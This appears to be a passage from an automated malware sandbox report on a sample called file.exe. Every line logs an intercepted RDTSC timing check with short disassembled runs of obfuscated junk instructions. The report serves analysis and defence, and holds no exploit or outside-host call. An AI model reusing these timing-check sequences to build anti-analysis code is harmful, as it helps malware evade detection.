          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE16D second address: 9CE171 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE171 second address: 9CE17F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F1FDD1C1436h 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE17F second address: 9CE183 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CF131 second address: 9CF1AD instructions: 0x00000000 rdtsc 0x00000002 jg 00007F1FDD1C1438h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d pushad 0x0000000e mov dword ptr [ebp+122D1FC8h], esi 0x00000014 mov ah, 92h 0x00000016 popad 0x00000017 push 00000000h 0x00000019 movzx edi, cx 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push edi 0x00000021 call 00007F1FDD1C1438h 0x00000026 pop edi 0x00000027 mov dword ptr [esp+04h], edi 0x0000002b add dword ptr [esp+04h], 00000016h 0x00000033 inc edi 0x00000034 push edi 0x00000035 ret 0x00000036 pop edi 0x00000037 ret 0x00000038 mov di, si 0x0000003b mov edi, dword ptr [ebp+122D1D24h] 0x00000041 jnp 00007F1FDD1C144Eh 0x00000047 call 00007F1FDD1C1444h 0x0000004c mov di, ax 0x0000004f pop ebx 0x00000050 push eax 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007F1FDD1C1444h 0x00000058 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE3AA second address: 9CE3BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1FDD1C1210h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE3BE second address: 9CE3C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D020B second address: 9D0230 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C1211h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007F1FDD1C120Ch 0x00000013 je 00007F1FDD1C1206h 0x00000019 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D0230 second address: 9D023A instructions: 0x00000000 rdtsc 0x00000002 jo 00007F1FDD1C143Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CF32B second address: 9CF330 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CF330 second address: 9CF335 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D125F second address: 9D1269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D3873 second address: 9D387A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D1462 second address: 9D146C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D146C second address: 9D1470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D1470 second address: 9D1474 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D152B second address: 9D1531 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D74F1 second address: 9D74F9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DC6AD second address: 9DC6B7 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1FDD1C1436h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97485A second address: 974870 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F1FDD1C120Eh 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E5FD1 second address: 9E5FDE instructions: 0x00000000 rdtsc 0x00000002 jno 00007F1FDD1C1436h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E5FDE second address: 9E5FE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E62B2 second address: 9E62EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C1448h 0x00000007 jmp 00007F1FDD1C1445h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F1FDD1C143Ah 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E62EF second address: 9E62FB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jne 00007F1FDD1C1206h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E65FB second address: 9E65FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E687F second address: 9E6891 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 js 00007F1FDD1C120Ch 0x0000000c jnc 00007F1FDD1C1206h 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E6891 second address: 9E689B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F1FDD1C1436h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E689B second address: 9E689F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E689F second address: 9E68E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1FDD1C1445h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F1FDD1C143Eh 0x00000011 pop edx 0x00000012 pop eax 0x00000013 ja 00007F1FDD1C1456h 0x00000019 jmp 00007F1FDD1C143Eh 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E68E2 second address: 9E68E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EB14D second address: 9EB19A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F1FDD1C143Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c je 00007F1FDD1C1436h 0x00000012 pushad 0x00000013 popad 0x00000014 jc 00007F1FDD1C1436h 0x0000001a popad 0x0000001b push esi 0x0000001c jmp 00007F1FDD1C1448h 0x00000021 pushad 0x00000022 popad 0x00000023 pop esi 0x00000024 ja 00007F1FDD1C1442h 0x0000002a js 00007F1FDD1C1436h 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EB19A second address: 9EB1D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 jmp 00007F1FDD1C1211h 0x0000000c pushad 0x0000000d popad 0x0000000e jnc 00007F1FDD1C1206h 0x00000014 popad 0x00000015 jmp 00007F1FDD1C1214h 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e jp 00007F1FDD1C1206h 0x00000024 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EB1D9 second address: 9EB1F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C1443h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EB4A8 second address: 9EB4AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EB4AE second address: 9EB4D7 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F1FDD1C1436h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007F1FDD1C1445h 0x00000010 jmp 00007F1FDD1C143Fh 0x00000015 push eax 0x00000016 push edx 0x00000017 push edi 0x00000018 pop edi 0x00000019 js 00007F1FDD1C1436h 0x0000001f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EB83C second address: 9EB85E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F1FDD1C1215h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push edi 0x00000010 pop edi 0x00000011 popad 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EAEBD second address: 9EAEED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F1FDD1C1436h 0x0000000a jmp 00007F1FDD1C143Dh 0x0000000f popad 0x00000010 jmp 00007F1FDD1C1448h 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 977DBF second address: 977DED instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jo 00007F1FDD1C1206h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e pop eax 0x0000000f jmp 00007F1FDD1C1216h 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jo 00007F1FDD1C1206h 0x0000001d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EF8F8 second address: 9EF902 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F1FDD1C1436h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B38EE second address: 99DED1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 jp 00007F1FDD1C1217h 0x0000000e nop 0x0000000f xor edi, 20F50C05h 0x00000015 mov edx, dword ptr [ebp+122D1C66h] 0x0000001b lea eax, dword ptr [ebp+12488655h] 0x00000021 mov dword ptr [ebp+122D2063h], ecx 0x00000027 push eax 0x00000028 ja 00007F1FDD1C1231h 0x0000002e mov dword ptr [esp], eax 0x00000031 mov dx, 7995h 0x00000035 call dword ptr [ebp+12466EFCh] 0x0000003b jne 00007F1FDD1C1217h 0x00000041 pushad 0x00000042 jmp 00007F1FDD1C120Ch 0x00000047 jp 00007F1FDD1C120Eh 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B3DA7 second address: 9B3DAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B3DAE second address: 9B3DBE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B3F65 second address: 9B3FBB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C143Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b jnp 00007F1FDD1C143Eh 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 pushad 0x00000016 jmp 00007F1FDD1C1440h 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 popad 0x00000021 popad 0x00000022 mov eax, dword ptr [eax] 0x00000024 jno 00007F1FDD1C1441h 0x0000002a mov dword ptr [esp+04h], eax 0x0000002e pushad 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B4128 second address: 9B412E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B412E second address: 9B4133 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B4263 second address: 9B426C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B433E second address: 9B4363 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C1446h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pop edi 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B4363 second address: 9B4368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B47F9 second address: 9B47FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B4B94 second address: 9B4B9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99EA71 second address: 99EA7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99EA7A second address: 99EA86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F1FDD1C1206h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EFBE3 second address: 9EFBE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EFBE7 second address: 9EFBED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EFD6F second address: 9EFD83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jmp 00007F1FDD1C143Bh 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EFD83 second address: 9EFD8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F1FDD1C1206h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EFD8F second address: 9EFD93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EFD93 second address: 9EFDA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007F1FDD1C1206h 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EFDA3 second address: 9EFDF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007F1FDD1C1436h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007F1FDD1C1447h 0x00000014 pushad 0x00000015 push esi 0x00000016 pop esi 0x00000017 jbe 00007F1FDD1C1436h 0x0000001d jl 00007F1FDD1C1436h 0x00000023 jmp 00007F1FDD1C1446h 0x00000028 popad 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EFDF3 second address: 9EFDF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F00A3 second address: 9F00A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F00A7 second address: 9F00AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F00AB second address: 9F00B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F00B3 second address: 9F00B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F01F2 second address: 9F01F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F01F6 second address: 9F0230 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C1218h 0x00000007 jc 00007F1FDD1C1206h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F1FDD1C1218h 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F6367 second address: 9F63A7 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1FDD1C143Ch 0x00000008 jl 00007F1FDD1C1444h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jbe 00007F1FDD1C1457h 0x00000016 pushad 0x00000017 jmp 00007F1FDD1C1443h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F63A7 second address: 9F63AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F4D45 second address: 9F4D69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F1FDD1C1446h 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F4D69 second address: 9F4D6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F5041 second address: 9F505C instructions: 0x00000000 rdtsc 0x00000002 je 00007F1FDD1C143Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007F1FDD1C146Bh 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F505C second address: 9F5083 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1FDD1C120Dh 0x00000009 jno 00007F1FDD1C1206h 0x0000000f popad 0x00000010 pushad 0x00000011 jnl 00007F1FDD1C1206h 0x00000017 jl 00007F1FDD1C1206h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F5083 second address: 9F5089 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F52E2 second address: 9F52E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F52E7 second address: 9F52F1 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1FDD1C143Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F55B2 second address: 9F55D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C120Fh 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007F1FDD1C1206h 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F55D1 second address: 9F55F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C1449h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F55F2 second address: 9F5671 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F1FDD1C1213h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F1FDD1C1215h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jmp 00007F1FDD1C1214h 0x00000019 jmp 00007F1FDD1C1218h 0x0000001e popad 0x0000001f je 00007F1FDD1C1224h 0x00000025 jmp 00007F1FDD1C1218h 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F5671 second address: 9F5675 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F591E second address: 9F5937 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F1FDD1C1213h 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F5AAD second address: 9F5AC9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F1FDD1C1444h 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F5AC9 second address: 9F5AEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C120Fh 0x00000007 jmp 00007F1FDD1C120Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F5AEB second address: 9F5AF0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F5C4C second address: 9F5C55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F5C55 second address: 9F5C6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F1FDD1C1442h 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F5C6F second address: 9F5C75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F5DA9 second address: 9F5DAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F61F0 second address: 9F61F6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FF434 second address: 9FF448 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F1FDD1C143Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A035FC second address: A03600 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A05C45 second address: A05C49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
